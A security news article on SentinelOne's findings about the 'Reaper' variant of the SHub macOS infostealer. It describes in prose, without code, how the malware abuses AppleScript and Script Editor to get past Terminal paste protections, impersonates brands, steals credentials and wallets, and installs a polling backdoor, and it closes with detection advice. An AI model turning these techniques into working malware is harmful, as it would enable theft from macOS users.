Reaper Variant Of SHub Spoofs Apple Security Updates

The operators behind the SHub macOS infostealer have introduced a more sophisticated variant called "Reaper." This shows how macOS-focused malware keeps evolving, moving beyond basic credential theft into persistent, multi-stage compromise operations.

The latest campaign blends social engineering, trusted-brand impersonation, and stealthy persistence to bypass Apple's recent ClickFix-style attack defenses. Researchers warn that this campaign is part of a larger trend: attackers increasingly use native Apple tools and legitimate system processes to evade detection.

Security researchers at SentinelOne discovered the new SHub Reaper variant while investigating malicious macOS installer campaigns. These campaigns masqueraded as legitimate software downloads. The attackers used fake installers for popular applications such as WeChat and Miro. They hosted these on typo-squatted domains that closely resembled real vendor infrastructure. Domains like "mlcrosoft[.]co[.]com" gave the false appearance of trusted Microsoft-hosted content.

Unlike earlier SHub campaigns that depended heavily on ClickFix-style Terminal execution tricks, the Reaper variant adopted a different infection strategy that bypasses Apple's newly introduced protections in macOS Tahoe 26.4. Apple added security prompts earlier this year to warn users when they attempt to paste potentially dangerous commands into Terminal, specifically targeting the growing abuse of ClickFix social engineering tactics.

The Reaper operators bypassed those safeguards by abusing the applescript:// URL scheme. Instead of tricking users into pasting commands into Terminal, the malware launches macOS Script Editor with a preloaded malicious AppleScript. The attackers obscured the payload by padding the script window with fake content and ASCII art. This kept the dangerous code hidden below the visible area of the editor. When victims clicked "Run," the malware silently executed hidden shell commands to download more payloads.

Researchers noted the malware deliberately impersonated multiple major technology brands at different stages of the attack. Victims first saw fake installers for legitimate productivity software. Payloads then came from Microsoft-themed infrastructure. During execution, victims received fake Apple security update messages. Later, persistence mechanisms were hidden in directories disguised as Google software update components. This rotating impersonation strategy made users more likely to trust system activity.

The malware specifically displayed fake update messages referencing Apple's XProtectRemediator, a legitimate macOS malware remediation utility. By mimicking authentic Apple security notifications, the attackers attempted to normalize suspicious system behavior and reduce the likelihood that victims would terminate the process.

Before deploying its main payload, Reaper checked its environment for analysis indicators and profiled victims, skipping devices using Russian-language settings or those likely in the Commonwealth of Independent States. This tactic is common in financially motivated malware.

The malicious websites hosting the fake installers also performed extensive browser fingerprinting and anti-analysis. JavaScript on the collected pages collected information about browser extensions, system hardware, location, and potential virtual machines. The malware specifically targeted password managers (such as 1Password, Bitwarden, and LastPass) and crypto wallet extensions (such as MetaMask and Phantom).

To hinder security researchers, the attackers used multiple anti-debugging and anti-analysis techniques. Malicious pages disrupted browser developer tools, disabled F12, and triggered debugger loops. If the malware detected that developer tools were open, the webpage displayed a Russian-language "Access Denied" message.

Once active on the victim system, Reaper focused heavily on credential theft and data exfiltration. The malware targeted browser data from Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, and Orion, harvesting stored credentials, cookies, and session data. It also targeted cryptocurrency wallet applications, including Exodus, Atomic Wallet, Ledger Live, Electrum, and Trezor Suite.

This campaign showed expanded capabilities compared to earlier SHub variants by adding document theft similar to Atomic macOS Stealer (AMOS). Reaper searched the Desktop and Documents directories for valuable files, including Microsoft Office documents, spreadsheets, wallet files, configuration data, and remote desktop connection files. The malware also collected image files and JSON-based data within certain size limits. This maximized valuable exfiltration while reducing operational noise.

Researchers found that the malware compressed stolen data into staged archives before uploading. It sent the contents in segmented chunks to its command-and-control infrastructure. Chunked uploads helped attackers transfer large datasets reliably. This approach avoided interruptions from network instability or upload size restrictions.

One of the campaign's most concerning features involved direct tampering with cryptocurrency wallet applications. Reaper searched infected systems for installed wallet software and replaced legitimate application components with trojanized versions downloaded from attacker-controlled infrastructure. The malware then removed macOS quarantine attributes and performed ad hoc code signing to help the modified applications execute without immediate security warnings.

Not Just an Infostealer

Reaper established persistence beyond immediate data theft. It disguised a Launch Agent configuration within directories that appeared to be Google software update components. The malware installed a recurring background process that contacted the attacker every 60 seconds. This process waited for new instructions. If operators sent new payloads through the command-and-control channel, the malware executed them directly under the current user's privileges.

This persistence mechanism transformed the malware from a traditional smash-and-grab infostealer into a longer-term access platform capable of supporting additional malicious activity. Security researchers warned that the backdoor functionality gave attackers opportunities to deploy secondary payloads, expand credential theft operations, or pivot deeper into enterprise environments after the initial compromise.

The emergence of Reaper highlights the rapid adaptation between operating system vendors and malware developers. Apple introduced new Terminal paste protections in macOS Tahoe 26.4 to stop ClickFix campaigns that used social engineering to trick users into running malicious commands. However, researchers saw attackers quickly move to Script Editor abuse and AppleScript flows. These methods sidestepped the new protections entirely.

The cybersecurity community increasingly warns that sophisticated macOS malware is undermining the belief that Apple systems are inherently secure.

Researchers recommend organizations monitor for suspicious AppleScript activity and unexpected Script Editor launches. They also urge watching for unusual LaunchAgent creations and outbound connections after script execution. Users should avoid downloading software from unverified domains and scrutinize any unexpected update prompts. This is especially important for prompts requesting manual script execution or password entry outside normal macOS update workflows.

The SHub Reaper campaign shows macOS attackers refining their social engineering and leveraging native Apple tools to remain effective despite new defenses. Instead of risky binaries, attackers exploit trusted workflows and familiar brand elements to blend malicious activity with normal system behavior.